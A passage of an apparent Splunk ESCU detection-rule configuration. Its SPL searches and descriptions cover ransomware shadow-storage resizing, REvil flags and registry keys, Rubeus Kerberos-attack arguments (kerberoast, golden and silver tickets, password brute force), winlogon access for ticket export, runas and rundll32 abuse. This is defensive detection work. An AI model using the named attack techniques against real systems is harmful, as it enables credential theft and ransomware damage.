process. action.escu.known_false_positives = network admin can resize the shadowstorage for valid purposes. action.escu.creation_date = 2021-03-12 action.escu.modification_date = 2021-03-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Resize ShadowStorage volume - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Clop Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A process $parent_process_name$ attempt to resize shadow copy with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Resize ShadowStorage volume - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytics identifies the resizing of shadowstorage by ransomware malware to avoid the shadow volumes being made again. this technique is an alternative by ransomware attacker than deleting the shadowstorage which is known alert in defensive team. one example of ransomware that use this technique is CLOP ransomware where it drops a .bat file that will resize the shadowstorage to minimum size as much as possible action.notable.param.rule_title = Resize ShadowStorage volume action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as cmdline values(Processes.parent_process_name) as parent_process values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell.exe" OR Processes.parent_process_name = "powershell_ise.exe" OR Processes.parent_process_name = "wmic.exe" Processes.process_name = "vssadmin.exe" Processes.process="*resize*" Processes.process="*shadowstorage*" Processes.process="*/maxsize*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `resize_shadowstorage_volume_filter` [ESCU - Revil Common Exec Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious commandline parameter that are commonly used by REVIL ransomware to encrypts the compromise machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious commandline parameter that are commonly used by REVIL ransomware to encrypts the compromise machine. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = third party tool may have same command line parameters as revil ransomware. action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Revil Common Exec Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ with commandline $process$ related to revil ransomware in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Revil Common Exec Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies suspicious commandline parameter that are commonly used by REVIL ransomware to encrypts the compromise machine. action.notable.param.rule_title = Revil Common Exec Parameter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* -nolan *" OR Processes.process = "* -nolocal *" OR Processes.process = "* -fast *" OR Processes.process = "* -full *" by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `revil_common_exec_parameter_filter` [ESCU - Revil Registry Entry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious modification in registry entry to keep some malware data during its infection. This technique seen in several apt implant, malware and ransomware like REVIL where it keep some information like the random generated file extension it uses for all the encrypted files and ransomware notes file name in the compromised host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious modification in registry entry to keep some malware data during its infection. This technique seen in several apt implant, malware and ransomware like REVIL where it keep some information like the random generated file extension it uses for all the encrypted files and ransomware notes file name in the compromised host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Revil Registry Entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = A registry entry $registry_path$ with registry value $registry_value_name$ and $registry_value_name$ related to revil ransomware in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Revil Registry Entry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies suspicious modification in registry entry to keep some malware data during its infection. This technique seen in several apt implant, malware and ransomware like REVIL where it keep some information like the random generated file extension it uses for all the encrypted files and ransomware notes file name in the compromised host. action.notable.param.rule_title = Revil Registry Entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\SOFTWARE\\WOW6432Node\\Facebook_Assistant\\*" OR Registry.registry_path="*\\SOFTWARE\\WOW6432Node\\BlackLivesMatter*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `revil_registry_entry_filter` [ESCU - Rubeus Command Line Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project and Vincent LE TOUXs MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc. Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003", "T1558", "T1558.003", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project and Vincent LE TOUXs MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc. Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, legitimate applications may use the same command line parameters as Rubeus. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Rubeus Command Line Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "CISA AA23-347A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Rubeus command line parameters were used on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rubeus Command Line Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003", "T1558", "T1558.003", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project and Vincent LE TOUXs MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc. Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.notable.param.rule_title = Rubeus Command Line Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*ptt /ticket*" OR Processes.process = "* monitor /interval*" OR Processes.process ="* asktgt* /user:*" OR Processes.process ="* asktgs* /service:*" OR Processes.process ="* golden* /user:*" OR Processes.process ="* silver* /service:*" OR Processes.process ="* kerberoast*" OR Processes.process ="* asreproast*" OR Processes.process = "* renew* /ticket:*" OR Processes.process = "* brute* /password:*" OR Processes.process = "* brute* /passwords:*" OR Processes.process ="* harvest*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rubeus_command_line_parameters_filter` [ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for a process accessing the winlogon.exe system process. The Splunk Threat Research team identified this behavior when using the Rubeus tool to monitor for and export kerberos tickets from memory. Before being able to export tickets. Rubeus will try to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe before trying to monitor for kerberos tickets. Exporting tickets from memory is typically the first step for pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic looks for a process accessing the winlogon.exe system process. The Splunk Threat Research team identified this behavior when using the Rubeus tool to monitor for and export kerberos tickets from memory. Before being able to export tickets. Rubeus will try to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe before trying to monitor for kerberos tickets. Exporting tickets from memory is typically the first step for pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.escu.how_to_implement = This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 10. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. action.escu.known_false_positives = Legitimate applications may obtain a handle for winlogon.exe. Filter as needed action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Winlogon.exe was accessed by $SourceImage$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for a process accessing the winlogon.exe system process. The Splunk Threat Research team identified this behavior when using the Rubeus tool to monitor for and export kerberos tickets from memory. Before being able to export tickets. Rubeus will try to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe before trying to monitor for kerberos tickets. Exporting tickets from memory is typically the first step for pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.notable.param.rule_title = Rubeus Kerberos Ticket Exports Through Winlogon Access action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage=C:\\Windows\\system32\\winlogon.exe (GrantedAccess=0x1f3fff) (SourceImage!=C:\\Windows\\system32\\svchost.exe AND SourceImage!=C:\\Windows\\system32\\lsass.exe AND SourceImage!=C:\\Windows\\system32\\LogonUI.exe AND SourceImage!=C:\\Windows\\system32\\smss.exe AND SourceImage!=C:\\Windows\\system32\\wbem\\wmiprvse.exe) | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `rubeus_kerberos_ticket_exports_through_winlogon_access_filter` [ESCU - Runas Execution in CommandLine - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic look for a spawned runas.exe process with a administrator user option parameter. This parameter was abused by adversaries, malware author or even red teams to gain elevated privileges in target host. This is a good hunting query to figure out privilege escalation tactics that may used for different stages like lateral movement but take note that administrator may use this command in purpose so its better to see other event context before and after this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic look for a spawned runas.exe process with a administrator user option parameter. This parameter was abused by adversaries, malware author or even red teams to gain elevated privileges in target host. This is a good hunting query to figure out privilege escalation tactics that may used for different stages like lateral movement but take note that administrator may use this command in purpose so its better to see other event context before and after this analytic. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated or manual execute this command that may generate false positives. filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Runas Execution in CommandLine - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Runas Execution in CommandLine - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_runas` AND Processes.process = "*/user:*" AND Processes.process = "*admin*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `runas_execution_in_commandline_filter` [ESCU - Rundll32 Control RunDLL Hunt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. \ This is written to be a bit more broad by not including .cpl. \ During triage, review parallel processes to identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. \ This is written to be a bit more broad by not including .cpl. \ During triage, review parallel processes to identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This is a hunting detection, meant to provide a understanding of how voluminous control_rundll is within the environment. action.escu.creation_date = 2021-09-08 action.escu.modification_date = 2021-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Control RunDLL Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Control RunDLL Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-40444"], "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_control_rundll_hunt_filter` [ESCU - Rundll32 Control RunDLL World Writable Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This may be tuned, or a new one related, by adding .cpl to command-line. However, it's important to look for both. Tune/filter as needed. action.escu.creation_date = 2021-09-08 action.escu.modification_date = 2021-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Control RunDLL World Writable Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a suspicious file from disk. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Control RunDLL World Writable Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. action.notable.param.rule_title = Rundll32 Control RunDLL World Writable Directory action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL* AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_control_rundll_world_writable_directory_filter` [ESCU - Rundll32 Create Remote Thread To A Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe to any process. This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. action.escu.mappings = 